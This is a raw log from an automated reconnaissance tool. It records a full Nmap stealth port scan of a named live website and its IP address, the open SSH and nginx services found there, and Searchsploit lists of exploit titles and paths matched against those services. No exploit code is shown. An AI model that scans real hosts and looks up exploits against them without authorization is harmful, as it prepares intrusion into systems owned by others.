- I, [2017-10-27T04:59:23.817988 #8161] INFO -- : Using nmap scan output file logs/nmap_output_2017-10-27_04-58-06.xml
- W, [2017-10-27T04:59:23.819890 #8161] WARN -- : Yasuo did not find any potential hosts to enumerate
- [92m + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 04:59 EDT
- NSE: Loaded 42 scripts for scanning.
- Initiating Parallel DNS resolution of 1 host. at 04:59
- Completed Parallel DNS resolution of 1 host. at 04:59, 0.06s elapsed
- Initiating SYN Stealth Scan at 04:59
- Scanning candydollchan.net (91.219.29.120) [65355 ports]
- Discovered open port 22/tcp on 91.219.29.120
- Discovered open port 80/tcp on 91.219.29.120
- Increasing send delay for 91.219.29.120 from 0 to 5 due to 11 out of 23 dropped probes since last increase.
- Increasing send delay for 91.219.29.120 from 5 to 10 due to 59 out of 146 dropped probes since last increase.
- SYN Stealth Scan Timing: About 3.73% done; ETC: 05:13 (0:13:20 remaining)
- SYN Stealth Scan Timing: About 4.62% done; ETC: 05:21 (0:21:00 remaining)
- Warning: 91.219.29.120 giving up on port because retransmission cap hit (6).
- SYN Stealth Scan Timing: About 5.55% done; ETC: 05:26 (0:25:49 remaining)
- SYN Stealth Scan Timing: About 6.43% done; ETC: 05:30 (0:29:22 remaining)
- SYN Stealth Scan Timing: About 7.26% done; ETC: 05:34 (0:32:09 remaining)
- SYN Stealth Scan Timing: About 8.09% done; ETC: 05:36 (0:34:16 remaining)
- SYN Stealth Scan Timing: About 8.78% done; ETC: 05:39 (0:36:32 remaining)
- SYN Stealth Scan Timing: About 9.54% done; ETC: 05:42 (0:38:33 remaining)
- SYN Stealth Scan Timing: About 16.67% done; ETC: 05:43 (0:36:20 remaining)
- SYN Stealth Scan Timing: About 20.43% done; ETC: 05:42 (0:34:09 remaining)
- SYN Stealth Scan Timing: About 25.79% done; ETC: 05:42 (0:31:59 remaining)
- SYN Stealth Scan Timing: About 29.92% done; ETC: 05:41 (0:29:47 remaining)
- SYN Stealth Scan Timing: About 34.03% done; ETC: 05:41 (0:27:39 remaining)
- SYN Stealth Scan Timing: About 42.60% done; ETC: 05:43 (0:25:30 remaining)
- SYN Stealth Scan Timing: About 47.67% done; ETC: 05:43 (0:23:14 remaining)
- SYN Stealth Scan Timing: About 53.05% done; ETC: 05:44 (0:20:57 remaining)
- SYN Stealth Scan Timing: About 62.61% done; ETC: 05:49 (0:18:39 remaining)
- SYN Stealth Scan Timing: About 67.96% done; ETC: 05:49 (0:16:06 remaining)
- SYN Stealth Scan Timing: About 73.60% done; ETC: 05:50 (0:13:33 remaining)
- SYN Stealth Scan Timing: About 82.33% done; ETC: 06:01 (0:10:54 remaining)
- SYN Stealth Scan Timing: About 87.24% done; ETC: 06:10 (0:09:01 remaining)
- SYN Stealth Scan Timing: About 90.92% done; ETC: 06:17 (0:07:04 remaining)
- SYN Stealth Scan Timing: About 93.74% done; ETC: 06:22 (0:05:12 remaining)
- SYN Stealth Scan Timing: About 95.80% done; ETC: 06:26 (0:03:38 remaining)
- SYN Stealth Scan Timing: About 97.22% done; ETC: 06:28 (0:02:29 remaining)
- SYN Stealth Scan Timing: About 98.17% done; ETC: 06:30 (0:01:40 remaining)
- SYN Stealth Scan Timing: About 98.82% done; ETC: 06:31 (0:01:05 remaining)
- SYN Stealth Scan Timing: About 99.39% done; ETC: 06:31 (0:00:34 remaining)
- Completed SYN Stealth Scan at 06:55, 6961.34s elapsed (65355 total ports)
- Initiating Service scan at 06:55
- Scanning 2 services on candydollchan.net (91.219.29.120)
- Completed Service scan at 06:55, 9.91s elapsed (2 services on 1 host)
- Initiating OS detection (try #1) against candydollchan.net (91.219.29.120)
- Retrying OS detection (try #2) against candydollchan.net (91.219.29.120)
- NSE: Script scanning 91.219.29.120.
- Initiating NSE at 06:56
- Completed NSE at 06:56, 11.20s elapsed
- Initiating NSE at 06:56
- Completed NSE at 06:56, 0.01s elapsed
- Nmap scan report for candydollchan.net (91.219.29.120)
- Host is up (0.77s latency).
- rDNS record for 91.219.29.120: 120.29.219.91.colo.ukrservers.com
- Not shown: 65344 closed ports
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
- 25/tcp filtered smtp
- 80/tcp open http nginx 1.10.2
- 135/tcp filtered msrpc
- 137/tcp filtered netbios-ns
- 138/tcp filtered netbios-dgm
- 139/tcp filtered netbios-ssn
- 445/tcp filtered microsoft-ds
- 465/tcp filtered smtps
- 587/tcp filtered submission
- 5853/tcp filtered unknown
- Aggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 3.10 (92%), Linux 4.0 (91%), Linux 2.6.39 (91%), Linux 3.11 - 4.1 (91%), Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Synology DiskStation Manager 5.1 (91%), WatchGuard Fireware 11.8 (91%)
- No exact OS matches for host (test conditions non-ideal).
- Uptime guess: 13.020 days (since Sat Oct 14 06:28:09 2017)
- Network Distance: 12 hops
- TCP Sequence Prediction: Difficulty=260 (Good luck!)
- IP ID Sequence Generation: All zeros
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 7013.21 seconds
- Raw packets sent: 109802 (4.836MB) | Rcvd: 102695 (4.187MB)
- [92m + -- ----------------------------=[Enumerating Exploits via Searchsploit]=--- -- +[0m
- [i] Reading: '/usr/share/sniper/loot/nmap/nmap-candydollchan.net.xml'
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- Debian [01;31m[KOpenSSH[m[K - Authenticated Remote SELinu | linux/remote/6094.txt
- Dropbear / [01;31m[KOpenSSH[m[K Server - 'MAX_UNAUTH_CLIE | multiple/dos/1572.pl
- FreeBSD [01;31m[KOpenSSH[m[K 3.5p1 - Remote Command Execu | freebsd/remote/17462.txt
- Novell Netware 6.5 - [01;31m[KOpenSSH[m[K Remote Stack Ov | novell/dos/14866.txt
- [01;31m[KOpenSSH[m[K 1.2 - '.scp' File Create/Overwrite | linux/remote/20253.sh
- [01;31m[KOpenSSH[m[K 2.x/3.0.1/3.0.2 - Channel Code Off-b | unix/remote/21314.txt
- [01;31m[KOpenSSH[m[K 2.x/3.x - Kerberos 4 TGT/AFS Token B | linux/remote/21402.txt
- [01;31m[KOpenSSH[m[K 3.x - Challenge-Response Buffer Over | unix/remote/21578.txt
- [01;31m[KOpenSSH[m[K 3.x - Challenge-Response Buffer Over | unix/remote/21579.txt
- [01;31m[KOpenSSH[m[K 4.3 p1 - Duplicated Block Remote Den | multiple/dos/2444.sh
- [01;31m[KOpenSSH[m[K 6.8 < 6.9 - 'PTY' Privilege Escalati | linux/local/41173.c
- [01;31m[KOpenSSH[m[K 7.2 - Denial of Service | linux/dos/40888.py
- [01;31m[KOpenSSH[m[K 7.2p1 - Authenticated xauth Command | multiple/remote/39569.py
- [01;31m[KOpenSSH[m[K 7.2p2 - Username Enumeration | linux/remote/40136.py
- [01;31m[KOpenSSH[m[K < 7.4 - 'UsePrivilegeSeparation Disa | linux/local/40962.txt
- [01;31m[KOpenSSH[m[K < 7.4 - agent Protocol Arbitrary Lib | linux/remote/40963.txt
- [01;31m[KOpenSSH[m[K/PAM 3.6.1p1 - 'gossh.sh' Remote User | linux/remote/26.sh
- [01;31m[KOpenSSH[m[K/PAM 3.6.1p1 - Remote Users Discovery | linux/remote/25.c
- [01;31m[KOpenSSH[m[Kd 7.2p2 - Username Enumeration (PoC) | linux/remote/40113.txt
- Portable [01;31m[KOpenSSH[m[K 3.6.1p-PAM/4.1-SuSE - Timin | multiple/remote/3303.sh
- glibc-2.2 / [01;31m[Kopenssh[m[K-2.3.0p1 / glibc 2.1.9x - | linux/local/258.sh
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- Novell Netware [01;31m[K6[m[K.5 - [01;31m[KOpenSSH[m[K Remote Stack Ov | novell/dos/148[01;31m[K6[m[K[01;31m[K6[m[K.txt
- [01;31m[KOpenSSH[m[K [01;31m[K6[m[K.8 < [01;31m[K6[m[K.9 - 'PTY' Privilege Escalati | linux/local/41173.c
- [01;31m[KOpenSSH[m[K/PAM 3.[01;31m[K6[m[K.1p1 - 'gossh.sh' Remote User | linux/remote/2[01;31m[K6[m[K.sh
- [01;31m[KOpenSSH[m[K/PAM 3.[01;31m[K6[m[K.1p1 - Remote Users Discovery | linux/remote/25.c
- Portable [01;31m[KOpenSSH[m[K 3.[01;31m[K6[m[K.1p-PAM/4.1-SuSE - Timin | multiple/remote/3303.sh
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- Novell Netware [01;31m[K6[m[K.5 - [01;31m[KOpenSSH[m[K Remote Stack Ov | novell/dos/148[01;31m[K6[m[K[01;31m[K6[m[K.txt
- [01;31m[KOpenSSH[m[K [01;31m[K6[m[K.8 < [01;31m[K6[m[K.9 - 'PTY' Privilege Escalati | linux/local/41173.c
- [01;31m[KOpenSSH[m[K/PAM 3.[01;31m[K6[m[K.1p1 - 'gossh.sh' Remote User | linux/remote/2[01;31m[K6[m[K.sh
- [01;31m[KOpenSSH[m[K/PAM 3.[01;31m[K6[m[K.1p1 - Remote Users Discovery | linux/remote/25.c
- Portable [01;31m[KOpenSSH[m[K 3.[01;31m[K6[m[K.1p-PAM/4.1-SuSE - Timin | multiple/remote/3303.sh
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- [01;31m[KOpenSSH[m[K/PAM 3.[01;31m[K6[m[K.[01;31m[K1[m[Kp[01;31m[K1[m[K - 'gossh.sh' Remote User | linux/remote/2[01;31m[K6[m[K.sh
- [01;31m[KOpenSSH[m[K/PAM 3.[01;31m[K6[m[K.[01;31m[K1[m[Kp[01;31m[K1[m[K - Remote Users Discovery | linux/remote/25.c
- Portable [01;31m[KOpenSSH[m[K 3.[01;31m[K6[m[K.[01;31m[K1[m[Kp-PAM/4.[01;31m[K1[m[K-SuSE - Timin | multiple/remote/3303.sh
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- AA [01;31m[KSMTP[m[K Server 1.1 - Crash (PoC) | windows/dos/14990.txt
- Alt-N MDaemon 6.5.1 - IMAP/[01;31m[KSMTP[m[K Remote Buffe | windows/remote/473.c
- Alt-N MDaemon 6.5.1 [01;31m[KSMTP[m[K Server - Multiple C | windows/remote/24624.c
- Alt-N MDaemon Server 2.71 SP1 - [01;31m[KSMTP[m[K HELO Ar | windows/dos/23146.c
- Apache James 2.2 - [01;31m[KSMTP[m[K Denial of Service | multiple/dos/27915.pl
- BL4 [01;31m[KSMTP[m[K Server < 0.1.5 - Remote Buffer Over | windows/dos/1721.pl
- BaSoMail 1.24 - [01;31m[KSMTP[m[K Server Command Buffer O | windows/dos/22668.txt
- BaSoMail Server 1.24 - POP3/[01;31m[KSMTP[m[K Remote Deni | windows/dos/594.pl
- Blat 2.7.6 [01;31m[KSMTP[m[K / NNTP Mailer - Buffer Overf | windows/local/38472.py
- Cisco PIX Firewall 4.x/5.x - [01;31m[KSMTP[m[K Content Fi | hardware/remote/20231.txt
- Citadel [01;31m[KSMTP[m[K 7.10 - Remote Overflow | windows/remote/4949.txt
- Cobalt Raq3 PopRelayD - Arbitrary [01;31m[KSMTP[m[K Relay | linux/remote/20994.txt
- CodeBlue 5.1 - [01;31m[KSMTP[m[K Response Buffer Overflow | windows/remote/21643.c
- CommuniCrypt Mail 1.16 - 'AN[01;31m[KSMTP[m[K.dll/AO[01;31m[KSMTP[m[K. | windows/remote/12663.html
- CommuniCrypt Mail 1.16 - [01;31m[KSMTP[m[K ActiveX Stack | windows/remote/16566.rb
- Computalynx CMail 2.3 SP2/2.4 - [01;31m[KSMTP[m[K Buffer | windows/remote/19495.c
- DeepOfix [01;31m[KSMTP[m[K Server 3.3 - Authentication By | linux/remote/29706.txt
- EType EServ 2.9x - [01;31m[KSMTP[m[K Remote Denial of Ser | windows/dos/22123.pl
- EasyMail Objects 'EM[01;31m[KSMTP[m[K.DLL 6.0.1' - Active | windows/remote/10007.html
- Eudora 7.1 - [01;31m[KSMTP[m[K ResponseRemote Remote Buff | windows/remote/3934.py
- Exim E[01;31m[KSMTP[m[K 4.80 - glibc gethostbyname Denial | linux/dos/35951.py
- FloosieTek FTGate PRO 1.22 - [01;31m[KSMTP[m[K MAIL FROM | windows/dos/22568.pl
- FloosieTek FTGate PRO 1.22 - [01;31m[KSMTP[m[K RCPT TO Bu | windows/dos/22569.pl
- Free [01;31m[KSMTP[m[K Server 2.2 - Spam Filter | windows/remote/1193.pl
- GoodTech [01;31m[KSMTP[m[K Server 5.14 - Denial of Servic | windows/dos/1162.pl
- Hastymail 1.x - IMAP [01;31m[KSMTP[m[K Command Injection | php/webapps/28777.txt
- Inetserv 3.23 - [01;31m[KSMTP[m[K Denial of Service | windows/dos/16035.py
- Inframail Advantage Server Edition 6.0 < 6.3 | windows/dos/1165.pl
- Ipswitch Imail Server 5.0 - [01;31m[KSMTP[m[K HELO Argume | windows/dos/23145.c
- Jack De Winter Win[01;31m[KSMTP[m[K 1.6 f/2.0 - Buffer Ov | windows/dos/20221.pl
- LeadTools Imaging LEAD[01;31m[KSmtp[m[K - ActiveX Control | windows/remote/35880.html
- Lotus Domino 4.6.1/4.6.4 Notes - [01;31m[KSMTP[m[KA MTA M | multiple/dos/19368.sh
- Lotus Domino [01;31m[KSMTP[m[K Router & Email Server and | multiple/dos/17549.txt
- MAILsweeper [01;31m[KSMTP[m[K 4.2.1 + F-Secure Anti-Virus | windows/dos/21006.txt
- MDaemon [01;31m[KSMTP[m[K Server 5.0.5 - Null Password Au | windows/remote/23002.txt
- MIMEsweeper For [01;31m[KSMTP[m[K - Multiple Cross-Site S | asp/webapps/38318.txt
- MailEnable 1.x - [01;31m[KSMTP[m[K HELO Command Remote De | windows/dos/28103.pl
- MailEnable 2.x - [01;31m[KSMTP[m[K NTLM Authentication Mu | windows/dos/28735.pl
- MailEnable 3.13 [01;31m[KSMTP[m[K Service - 'VRFY/EXPN' C | windows/dos/5235.py
- MailEnable Enterprise 1.x - [01;31m[KSMTP[m[K Remote Deni | windows/dos/916.pl
- Mailtraq 2.1.0.1302 - Remote Format String S | windows/dos/22780.txt
- Majordomo2 - Directory Traversal ([01;31m[KSMTP[m[K/HTTP) | multiple/remote/16103.txt
- Mercury/32 Mail [01;31m[KSMTP[m[KD - AUTH CRAM-MD5 Buffer | windows/remote/16821.rb
- Mercury/32 Mail [01;31m[KSMTP[m[KD - Remote Unauthenticat | windows/dos/4294.pl
- Mercury/32 Mail [01;31m[KSMTP[m[KD 4.51 - [01;31m[KSMTP[m[KD CRAM-MD5 | windows/remote/4301.cpp
- Mercury/32 Mail Server 3.32 < 4.51 - [01;31m[KSMTP[m[K Un | windows/remote/4316.cpp
- Microsoft Exchange Server 4.0/5.0 - [01;31m[KSMTP[m[K HEL | windows/remote/23113.c
- Microsoft IIS 4.0/5.0 - [01;31m[KSMTP[m[K Service Encapsu | windows/remote/21613.txt
- Microsoft Windows - ANI LoadAniIcon() Chunk | windows/remote/16698.rb
- Mock [01;31m[KSMTP[m[K Server 1.0 - Remote Crash (PoC) | windows/dos/37954.py
- NJStar Communicator 3.00 - Mini[01;31m[KSMTP[m[K Server R | windows/remote/18057.rb
- NJStar Communicator Mini[01;31m[KSmtp[m[K - Buffer Overfl | windows/dos/18196.py
- NetcPlus SmartServer 3.5.1 - [01;31m[KSMTP[m[K Buffer Ove | windows/remote/19494.c
- Network Associates Webshield [01;31m[KSMTP[m[K 4.5 - Inva | windows/dos/20432.txt
- Postcast Server Pro 3.0.61 - / Quiksoft Easy | windows/remote/4328.html
- Postfix [01;31m[KSMTP[m[K 4.2.x < 4.2.48 - Remote Exploit | linux/remote/34896.py
- QK [01;31m[KSMTP[m[K 3.01 - 'RCPT TO' Remote Buffer Overf | windows/remote/2649.c
- QK [01;31m[KSMTP[m[K 3.01 - 'RCPT TO' Remote Buffer Overf | windows/remote/3067.txt
- QK [01;31m[KSMTP[m[K 3.01 - 'RCPT TO' Remote Denial of Se | windows/dos/2625.c
- QK [01;31m[KSMTP[m[K Server - Malformed Commands Multiple | multiple/dos/30885.txt
- Qmail [01;31m[KSMTP[m[K - Bash Environment Variable Injec | linux/remote/42938.rb
- Qwik [01;31m[KSMTP[m[K 0.3 - Format String | linux/remote/620.c
- SPECTral Personal [01;31m[KSMTP[m[K Server 0.4.2 - Denial | windows/dos/899.pl
- Sitemagic CMS - '[01;31m[KSMTp[m[Kl' Directory Traversal | php/webapps/35877.txt
- SmartMax MailMax 1.0 - [01;31m[KSMTP[m[K Buffer Overflow | windows/remote/20600.c
- Softek MailMarshal 4 / Trend Micro ScanMail | multiple/remote/21029.pl
- SoftiaCom wMailServer 1.0 - [01;31m[KSMTP[m[K Remote Buff | windows/remote/1463.pm
- SquirrelMail PGP Plugin - Command Execution | linux/remote/16888.rb
- SysGauge 1.5.18 - [01;31m[KSMTP[m[K Validation Buffer Ove | windows/remote/41672.rb
- TABS MailCarrier 2.51 - [01;31m[KSMTP[m[K 'EHLO' / 'HELO' | windows/remote/598.py
- TABS MailCarrier 2.51 - [01;31m[KSMTP[m[K EHLO Overflow ( | windows/remote/16822.rb
- YahooPOPs 1.6 - [01;31m[KSMTP[m[K Port Buffer Overflow | windows/remote/577.c
- YahooPOPs 1.6 - [01;31m[KSMTP[m[K Remote Buffer Overflow | windows/remote/582.c
- d[01;31m[KSMTP[m[K Mail Server 3.1b (Linux) - Format Stri | linux/remote/981.c
- i.Scribe [01;31m[KSMTP[m[K Client 2.00b - wscanf Remote F | windows/dos/7249.php
- iScripts AutoHoster - 'main_[01;31m[Ksmtp[m[K.php' Unspec | php/webapps/38889.txt
- nb[01;31m[KSMTP[m[K 0.99 - 'util.c' Client-Side Command E | linux/remote/1138.c
- s[01;31m[KSMTP[m[K 2.62 - 'standardize()' Buffer Overflow | linux/dos/34375.txt
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- [01;31m[KNginx[m[K (Debian-Based Distros + Gentoo) - 'log | linux/local/40768.sh
- [01;31m[KNginx[m[K 0.6.36 - Directory Traversal | multiple/remote/12804.txt
- [01;31m[KNginx[m[K 0.6.38 - Heap Corruption | linux/local/14830.py
- [01;31m[KNginx[m[K 0.6.x - Arbitrary Code Execution NullB | multiple/webapps/24967.txt
- [01;31m[KNginx[m[K 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5. | linux/dos/9901.txt
- [01;31m[KNginx[m[K 0.7.61 - WebDAV Directory Traversal | multiple/remote/9829.txt
- [01;31m[KNginx[m[K 0.7.64 - Terminal Escape Sequence in L | multiple/remote/33490.txt
- [01;31m[KNginx[m[K 0.7.65/0.8.39 (dev) - Source Disclosur | windows/remote/13822.txt
- [01;31m[KNginx[m[K 0.8.36 - Source Disclosure / Denial of | windows/remote/13818.txt
- [01;31m[KNginx[m[K 1.1.17 - URI Processing SecURIty Bypas | multiple/remote/38846.txt
- [01;31m[KNginx[m[K 1.3.9 < 1.4.0 - Chuncked Encoding Stac | linux/remote/25775.rb
- [01;31m[KNginx[m[K 1.3.9 < 1.4.0 - Denial of Service (PoC | linux/dos/25499.py
- [01;31m[KNginx[m[K 1.3.9/1.4.0 (x86) - Brute Force Remote | lin_x86/remote/26737.pl
- [01;31m[KNginx[m[K 1.4.0 (Generic Linux x64) - Remote Exp | lin_x86-64/remote/32277.txt
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- [01;31m[KNginx[m[K 0.7.0 < 0.7.6[01;31m[K1[m[K / 0.6.0 < 0.6.38 / 0.5. | linux/dos/990[01;31m[K1[m[K.txt
- [01;31m[KNginx[m[K 0.7.6[01;31m[K1[m[K - WebDAV Directory Traversal | multiple/remote/9829.txt
- [01;31m[KNginx[m[K [01;31m[K1[m[K.[01;31m[K1[m[K.[01;31m[K1[m[K7 - URI Processing SecURIty Bypas | multiple/remote/38846.txt
- [01;31m[KNginx[m[K [01;31m[K1[m[K.3.9 < [01;31m[K1[m[K.4.0 - Chuncked Encoding Stac | linux/remote/25775.rb
- [01;31m[KNginx[m[K [01;31m[K1[m[K.3.9 < [01;31m[K1[m[K.4.0 - Denial of Service (PoC | linux/dos/25499.py
- [01;31m[KNginx[m[K [01;31m[K1[m[K.3.9/[01;31m[K1[m[K.4.0 (x86) - Brute Force Remote | lin_x86/remote/26737.pl
- [01;31m[KNginx[m[K [01;31m[K1[m[K.4.0 (Generic Linux x64) - Remote Exp | lin_x86-64/remote/32277.txt
- --------------------------------------------- ---------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- BEA WebLogic 7.0 - Hostname/[01;31m[KNetBIOS[m[K Name Rem | windows/remote/22448.txt
- Microsoft Windows 95/98 - [01;31m[KNetBIOS[m[K NULL Name | windows/remote/19889.c
- Microsoft Windows NT 4.0/2000 - [01;31m[KNetBIOS[m[K Name | windows/remote/20106.cpp
- [01;31m[KnetBIOS[m[K - 'newsid' SQL Injection | php/webapps/5852.txt
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- BEA WebLogic 7.0 - Hostname/[01;31m[KNetBIOS[m[K Name Rem | windows/remote/22448.txt
- Microsoft Windows 95/98 - [01;31m[KNetBIOS[m[K NULL Name | windows/remote/19889.c
- Microsoft Windows NT 4.0/2000 - [01;31m[KNetBIOS[m[K Name | windows/remote/20106.cpp
- [01;31m[KnetBIOS[m[K - 'newsid' SQL Injection | php/webapps/5852.txt
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- BEA WebLogic 7.0 - Hostname/[01;31m[KNetBIOS[m[K Name Rem | windows/remote/22448.txt
- Microsoft Windows 95/98 - [01;31m[KNetBIOS[m[K NULL Name | windows/remote/19889.c
- Microsoft Windows NT 4.0/2000 - [01;31m[KNetBIOS[m[K Name | windows/remote/20106.cpp
- [01;31m[KnetBIOS[m[K - 'newsid' SQL Injection | php/webapps/5852.txt
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- MDAC 2.1.2.4202.3 / [01;31m[KMicrosoft[m[K Windows NT 4.0 | windows/local/19506.txt
- [01;31m[KMicrosoft[m[K Color Management Module 'icm32.dll | windows/dos/41657.txt
- [01;31m[KMicrosoft[m[K Color Management Module 'icm32.dll | windows/dos/41659.txt
- [01;31m[KMicrosoft[m[K Data Access Components (MDAC) 2.1 | windows/local/19425.txt
- [01;31m[KMicrosoft[m[K Data Access Components (MDAC) 2.1 | windows/remote/19424.pl
- [01;31m[KMicrosoft[m[K Edge - 'CTextÂExtractor::GetÂBlo | windows/dos/40797.html
- [01;31m[KMicrosoft[m[K Edge - Out-of-Boun[01;31m[Kds[m[K Access when F | windows/dos/42481.js
- [01;31m[KMicrosoft[m[K Edge 38.14393.1066.0 - 'CInputDate | windows/dos/42459.html
- [01;31m[KMicrosoft[m[K Edge 38.14393.1066.0 - 'COptionsCo | windows/dos/42759.html
- [01;31m[KMicrosoft[m[K Excel - Out-of-Boun[01;31m[Kds[m[K Read Remote | windows/local/39694.txt
- [01;31m[KMicrosoft[m[K GDI+ - 'gdiplus!GetRECTSForPlaybac | windows/dos/41656.txt
- [01;31m[KMicrosoft[m[K IIS - MDAC 'msadcs.dll' R[01;31m[KDS[m[K DataSt | windows/remote/19026.rb
- [01;31m[KMicrosoft[m[K IIS 3.0 - 'new[01;31m[Kds[m[Kn.exe' File Creati | windows/remote/20309.txt
- [01;31m[KMicrosoft[m[K Internet Explorer - Car[01;31m[KdS[m[KpaceClaim | windows/remote/29857.rb
- [01;31m[KMicrosoft[m[K Internet Explorer - MSHTML!CMultiR | windows/dos/40253.html
- [01;31m[KMicrosoft[m[K Internet Explorer - Recor[01;31m[Kds[m[Ket Doub | windows/remote/3577.html
- [01;31m[KMicrosoft[m[K Internet Explorer 6 - ADODB.Record | windows/dos/28145.html
- [01;31m[KMicrosoft[m[K Internet Explorer 6 - R[01;31m[KDS[m[K.DataCont | windows/dos/28194.txt
- [01;31m[KMicrosoft[m[K Internet Explorer 8 - MSHTML 'SRun | windows/dos/40841.html
- [01;31m[KMicrosoft[m[K Internet Explorer 9 - MSHTML CPtsT | windows/dos/40722.html
- [01;31m[KMicrosoft[m[K Internet Explorer 9/10/11 - CDOMSt | windows/remote/39698.html
- [01;31m[KMicrosoft[m[K Internet Explorer 9/10/11 - MSHTML | windows/dos/40748.html
- [01;31m[KMicrosoft[m[K LSASS Service - [01;31m[KDs[m[KRolerUpgradeDown | windows/remote/16368.rb
- [01;31m[KMicrosoft[m[K MsMpEng - Multiple Problems Handli | windows/local/42077.txt
- [01;31m[KMicrosoft[m[K OWC Sprea[01;31m[Kds[m[Kheet - HTMLURL Buffer O | windows/remote/16542.rb
- [01;31m[KMicrosoft[m[K Office / COM Object - 'WMALFXGFX[01;31m[KDS[m[K | windows/dos/39233.txt
- [01;31m[KMicrosoft[m[K Office 2007 - 'OGL.dll' DpOutputSp | windows/dos/37911.txt
- [01;31m[KMicrosoft[m[K Office 2007 - 'OGL.dll' ValidateBi | windows/dos/38217.txt
- [01;31m[KMicrosoft[m[K Office PowerPoint 2010 - GDI 'GDI3 | windows/dos/41419.txt
- [01;31m[KMicrosoft[m[K Office PowerPoint 2010 - MSO/OART | windows/dos/41418.txt
- [01;31m[KMicrosoft[m[K Office Products - Array Index Boun | windows/dos/1615.txt
- [01;31m[KMicrosoft[m[K Office Web Components (OWC) Spread | windows/dos/9163.txt
- [01;31m[KMicrosoft[m[K Office Web Components (OWC) Spread | windows/remote/16537.rb
- [01;31m[KMicrosoft[m[K Office Web Components Sprea[01;31m[Kds[m[Kheet | windows/remote/9224.py
- [01;31m[KMicrosoft[m[K Site Server Commerce Edition 3.0 a | windows/remote/19208.txt
- [01;31m[KMicrosoft[m[K Visual Basic Enterprise 6 SP6 - '. | windows/local/4938.py
- [01;31m[KMicrosoft[m[K Visual Studio .NET - 'msd[01;31m[Kds[m[K.dll' R | windows/remote/26167.pl
- [01;31m[KMicrosoft[m[K WININET.dll - CHttpÂHeaderÂParse | windows/dos/40747.html
- [01;31m[KMicrosoft[m[K Windows - 'ATMFD.DLL' Out-of-Bound | windows/dos/37916.txt
- [01;31m[KMicrosoft[m[K Windows - 'ATMFD.DLL' Out-of-Bound | windows/dos/37917.txt
- [01;31m[KMicrosoft[m[K Windows - 'ATMFD.dll' CharString S | windows/dos/37923.txt
- [01;31m[KMicrosoft[m[K Windows - 'USP10!CreateIndexTable' | windows/dos/42237.txt
- [01;31m[KMicrosoft[m[K Windows - 'USP10!MergeLigRecor[01;31m[Kds[m[K' | windows/dos/42234.txt
- [01;31m[KMicrosoft[m[K Windows - 'USP10!NextCharInLiga' U | windows/dos/42238.txt
- [01;31m[KMicrosoft[m[K Windows - 'USP10!SubstituteNtoM' U | windows/dos/42236.txt
- [01;31m[KMicrosoft[m[K Windows - 'USP10!otlReverseChainin | windows/dos/42241.txt
- [01;31m[KMicrosoft[m[K Windows - 'USP10!otlSinglePosLooku | windows/dos/42239.txt
- [01;31m[KMicrosoft[m[K Windows - 'USP10!otlValueRecord::a | windows/dos/42240.txt
- [01;31m[KMicrosoft[m[K Windows - 'USP10!ttoGetTableData' | windows/dos/42235.txt
- [01;31m[KMicrosoft[m[K Windows - 'gdi32.dll' EMR_SETDIBIT | windows/dos/41363.txt
- [01;31m[KMicrosoft[m[K Windows - 'gdi32.dll' Multiple DIB | windows/dos/39990.txt
- [01;31m[KMicrosoft[m[K Windows - 'win32k.sys' TTF Font Pr | windows/dos/37914.txt
- [01;31m[KMicrosoft[m[K Windows - 'win32k.sys' TTF Font Pr | windows/dos/37915.txt
- [01;31m[KMicrosoft[m[K Windows - 'win32k.sys' TTF Process | windows/dos/40598.txt
- [01;31m[KMicrosoft[m[K Windows - GDI+ DecodeCompressedRLE | windows/dos/40255.txt
- [01;31m[KMicrosoft[m[K Windows - GDI+ ValidateBitmapInfo | windows/dos/40256.txt
- [01;31m[KMicrosoft[m[K Windows - Uniscribe Font Processin | windows/dos/41646.txt
- [01;31m[KMicrosoft[m[K Windows - Uniscribe Font Processin | windows/dos/41648.txt
- [01;31m[KMicrosoft[m[K Windows - Uniscribe Font Processin | windows/dos/41650.txt
- [01;31m[KMicrosoft[m[K Windows - Uniscribe Font Processin | windows/dos/41652.txt
- [01;31m[KMicrosoft[m[K Windows - Uniscribe Font Processin | windows/dos/41655.txt
- [01;31m[KMicrosoft[m[K Windows - Uniscribe Heap-Based Out | windows/dos/41658.txt
- [01;31m[KMicrosoft[m[K Windows - Win32k!xxxRealDrawMenuIt | windows/dos/14668.txt
